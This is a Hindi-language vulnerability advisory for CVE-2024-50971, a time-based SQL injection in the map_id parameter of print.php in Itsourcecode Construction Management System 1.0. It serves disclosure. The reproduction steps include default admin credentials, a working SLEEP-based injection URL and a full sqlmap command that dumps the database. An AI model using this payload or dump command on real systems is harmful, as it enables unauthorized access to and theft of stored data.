CVE-2024-50971
विवरण
Itsourcecode Construction Management System 1.0 के print.php में SQL इंजेक्शन कमजोरी दूरस्थ हमलावरों को map_id पैरामीटर के माध्यम से मनमाने SQL कमांड निष्पादित करने की अनुमति देती है।
कमजोरी का प्रकार
SQL Injection
उत्पाद का विक्रेता
Itsourcecode
प्रभावित उत्पाद कोड आधार:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
प्रभावित घटक:
Itsourcecode Construction Management System v1.0 print.php पृष्ठ में map_id पैरामीटर के माध्यम से SQL इंजेक्शन के लिए कमजोर है।
हमले के वेक्टर:
- एप्लिकेशन को स्थानीय रूप से सेट करें, एक खाता पंजीकृत करें, और व्यवस्थापक क्रेडेंशियल admin:admin के साथ लॉगिन करें।
- अपने ब्राउज़र में निम्न URL पर जाएं:
http://localhost/monitoring_system/print.php?map_id=67
- SQL पेलोड इंजेक्ट करें:
URL में map_id पैरामीटर को संशोधित करके एक समय-आधारित SQL इंजेक्शन पेलोड शामिल करें।
http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
- एप्लिकेशन प्रतिक्रिया देखें:
यदि इंजेक्शन सफल होता है तो पृष्ठ को लोड होने में काफी अधिक समय (15 सेकंड) लेना चाहिए, जो पुष्टि करता है कि map_id पैरामीटर SQL इंजेक्शन के लिए कमजोर है।
- अब आगे के शोषण और डेटाबेस डंप करने के लिए नीचे दिए गए कमांड का उपयोग करके SQLMap टूल का उपयोग करें:
sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
संदर्भ:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection